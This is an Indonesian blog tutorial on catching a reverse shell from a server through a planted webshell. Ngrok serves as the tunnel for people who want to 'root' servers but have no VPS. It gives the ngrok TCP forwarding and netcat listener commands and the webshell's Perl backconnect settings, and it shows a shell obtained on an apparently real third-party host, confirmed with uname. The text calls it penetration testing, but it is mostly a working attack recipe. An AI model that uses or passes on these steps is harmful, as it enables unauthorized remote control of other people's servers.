Tanio

Tutorial Backconnect Server Dengan Ngrok


Introduction

Bagi temen temen yang mau rooting server tapi tidak punya VPS, ada cara lain yaitu dengan menggunakan ngrok. Meskipun tidak semua server atau web shell support backconnect dengan ngrok, tidak ada salahnya mencoba kan?


Tutorial ini menggunakan perl sebagai media backconnect antara server dan ngrok.


Requirements

Berikut alat-alat yang diperlukan untuk tutorial ini:

  • Ngrok Download - Pilih sesuai sistem operasi kamu
  • Server yang support perl sangat dianjurkan (sesuai dengan tutorial)
  • Netcat Download - disini saya menggunakan windows

Download dan Auth Ngrok

Jangan lupa untuk buat akun ngrok di sini guna mengautentikasi token. Ekstrak ngrok-XXX.zip nya lalu autentikasi token nya agar ngrok dapat berjalan. Ganti token sesuai dengan punyamu.

./ngrok authtoken initokenBqHnhg3_3X3JtBTSu1rNojz4kXXX

Konfigurasi Ngrok & Netcat

Selanjutnya jalankan ngrok dengan tcp, port sesuai selera misalkan:

./ngrok.exe tcp 1991

Pastikan ngrok berjalan dengan baik seperti di bawah ini:

ngrok by @inconshreveable                                                       (Ctrl+C to quit)

Session Status                online
Account                       Tan (Plan: Free)
Version                       2.3.23
Region                        United States (us)
Web Interface                 http://127.0.0.1:4040
Forwarding                    tcp://0.tcp.ngrok.io:16857 -> localhost:1991

Connections                   ttl     opn     rt1     rt5     p50     p90
                              0       0       0.00    0.00    0.00    0.00

Jalankan netcat, pastikan port sesuai dengan port yang di jalankan di ngrok:

./nc.exe -lnvp 1991

Pastikan netcat berjalan walau masih listening:

λ .\nc.exe -lnvp 1991
listening on [any] 1991 ...

Backconnect Server

Setelah semua terkonfigurasi, tinggal melakukan backconnect server ke komputer kita. Pastikan webshell yang kita gunakan mempunyai fitur backconnect.

Fitur Backconnect di webshell/backdoor
Fitur Backconnect di webshell/backdoor

Setelah semua terkonfigurasi, isi server dengan 0.tcp.ngrok.io dan isi Port dengan port yang dibuat oleh ngrok misal 16857. Di sini saya menggunakan perl. Untuk Bind port to /bin/sh Perl abaikan saja. Klik »

Contoh backconnect
Contoh backconnect

Cek di netcat, apakah sukses melakukan backconnect. Jika sudah ada balasan dari server seperti di bawah, berarti sudah sukses backconnect:

λ .\nc.exe -lnvp 1991
listening on [any] 1991 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 62032
sh: no job control in this shell
sh-4.2$

Uji Coba Command Linux

Selanjutnya tinggal Spawn TTY Shell. Mari kita coba jalankan command untuk memastikan kita sudah benar-benar mendapatkan shell nya:

sh-4.2$ uname -a
uname -a
Linux thewhitecloud.in 3.10.0-514.16.1.el7.x86_64 #1 SMP Wed Apr 12 15:04:24 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Conclusion

Tutorial ini berguna bagi kalian yang tidak mempunyai VPS saat melakukan penetration testing pada server. Dengan ngrok, kita bisa melakukan reverse connection tanpa memerlukan public IP address.


Tips: Pastikan firewall tidak memblokir koneksi keluar dari server target ke ngrok.